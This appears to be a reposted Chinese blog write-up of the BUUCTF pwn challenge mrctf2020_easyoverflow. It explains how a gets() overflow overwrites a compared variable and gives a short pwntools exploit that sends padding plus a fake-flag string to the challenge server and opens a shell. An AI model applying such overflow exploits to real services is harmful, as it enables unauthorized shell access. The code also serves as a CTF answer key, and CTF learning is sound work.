[BUUCTF-pwn]——mrctf2020_easyoverflow
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——mrctf2020_easyoverflow
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——mrctf2020_easyoverflow
題目不難這里就簡單講下思路
思路
因為check函數返回0才可以得到shell.
通過gets函數,我們可以將v5修改為我們想要的。
找到fake_flag 為n0t_r3@11y_f1@g
修改為這個就可以了。相同肯定返回0.
exploit
from pwn import * p = remote("node3.buuoj.cn",26609) payload = 'a'* 0x30 + "n0t_r3@11y_f1@g" p.sendline(payload)p.interactive() 與50位技術專家面對面20年技術見證,附贈技術全景圖總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——mrctf2020_easyoverflow的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——picoct
- 下一篇: [BUUCTF-pwn]——mrctf2